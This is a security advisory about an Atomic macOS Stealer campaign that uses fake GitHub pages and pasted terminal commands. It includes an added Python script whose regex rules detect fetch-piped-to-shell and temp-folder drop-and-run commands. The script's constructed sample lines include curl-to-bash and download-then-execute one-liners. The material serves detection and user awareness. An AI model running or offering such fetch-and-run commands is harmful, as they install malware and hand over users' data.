
LastPass has issued a warning about a widespread cyber campaign targeting macOS users. Malicious software is being disguised as legitimate applications and distributed through fake GitHub repositories. Read this Cybersecurity Threat Advisory to stay informed and protect your data.
What is the threat?
Hackers are targeting macOS users by creating fake GitHub pages that appear to belong to trusted companies. They use search engine optimization to push these pages to the top of search results, making them seem legitimate. When someone clicks the link, they’re taken to a site called macprograms-pro[.]com, where they’re instructed to run a command in their terminal. That command quietly downloads a file labeled as an “Update” to the computer’s temporary folder. In reality, it’s Atomic macOS Stealer (AMOS), a type of malware that has been used in attacks since 2023 and is designed to steal sensitive information.
Why is it noteworthy?
AMOS operates as malware-as-a-service, available for $1,000 per month. It’s designed to steal sensitive data from infected machines. Recently, its developers added a backdoor, allowing attackers persistent and stealthy access to compromised systems. According to LastPass, this campaign impersonates over 100 software solutions, including:
- 1Password
- Confluence
- Fidelity
- Gemini
- Adobe After Effects
- Thunderbird
- SentinelOne
What is the exposure or risk?
Hackers are going after a wide range of industries, including financial services, password managers, tech companies, AI platforms, and crypto wallets. They’re setting up fake GitHub pages using different usernames and Mac-related terms to make the sites look real. These attacks fall under a tactic called “ClickFix,” where hackers exploit people’s trust in search engines and rely on the fact that many users aren’t familiar with terminal commands. When someone runs the suggested command, it quietly compromises their system without them realizing what just happened.
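As an added example (not from the advisory, LastPass or Barracuda), the Python below turns the ClickFix pattern described above into detection heuristics run over shell-command records of the kind a macOS endpoint agent collects: a fetch piped straight into a shell, a download into the temp folder that is executed on the same line, and the "Update" decoy name sitting in a temp path. The sample commands and the example.invalid URLs are constructed.

```python
import re
from typing import NamedTuple

# Added example (not from the advisory): heuristic review of shell commands
# recorded on a macOS endpoint for the ClickFix pattern described above, i.e.
# a pasted one-liner that fetches remote content and runs it, or drops a file
# named "Update" into the temp folder. All sample lines below are constructed.

class Finding(NamedTuple):
    rule: str
    command: str

# Temp locations a pasted one-liner would typically write into on macOS.
TEMP = r"(?:(?:/private)?/tmp/|/var/folders/\S+?/|\$\{?TMPDIR\}?/?)"

RULES = {
    # Network content handed straight to a shell interpreter.
    "fetch-piped-to-shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|k)?sh\b", re.I),
    # Download saved under a temp dir, then a temp-dir path run on the same line.
    "temp-drop-and-run": re.compile(
        rf"\b(?:curl|wget)\b.*?(?:-o\s*|-O\s*|>\s*)['\"]?{TEMP}\S*.*?(?:&&|;)\s*"
        rf"(?:chmod\s+\+x\s+)?['\"]?{TEMP}\S*", re.I),
    # The decoy file name reported in this campaign, placed in a temp folder.
    "update-in-temp": re.compile(rf"{TEMP}['\"]?Update\b"),
}

def scan(commands):
    """Return one Finding per (rule, command) match; benign lines yield none."""
    return [Finding(name, cmd) for cmd in commands
            for name, rx in RULES.items() if rx.search(cmd)]

# Constructed sample: two benign admin commands, one ordinary download, and
# two lines shaped like the pasted commands this advisory describes.
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    "brew install --cask thunderbird",
    "curl -o ~/Downloads/report.pdf https://example.invalid/report.pdf",
    "curl -fsSL https://example.invalid/setup.sh | bash",
    "curl -o /tmp/Update https://example.invalid/pkg && chmod +x /tmp/Update && /tmp/Update",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"[{f.rule}] {f.command}")
```

The rules are heuristics for triage, not a signature for AMOS itself; a command that first changes into the temp directory and then runs a relative path would need an additional rule.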
What are the recommendations?
Barracuda recommends the following actions to prevent this attack:
- Question every command before you run it. Hackers use ClickFix attacks to trick users into executing harmful commands by taking advantage of their trust in search results and unfamiliarity with terminal instructions.
- Check the official website of the vendor or project when searching for software online. If you don’t see a macOS version there, it’s likely that any unofficial alternative is fake.
- Download apps only from official domains and app stores.
References
For more in-depth information on the above recommendations, please visit the following links:
- https://www.bleepingcomputer.com/news/security/lastpass-fake-password-managers-infect-mac-users-with-malware/
- https://www.securityweek.com/widespread-infostealer-campaign-targeting-macos-users/
- https://www.pcmag.com/news/hacker-targets-mac-users-looking-for-lastpass-downloads-on-search-engines
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
This post originally appeared on Smarter MSP.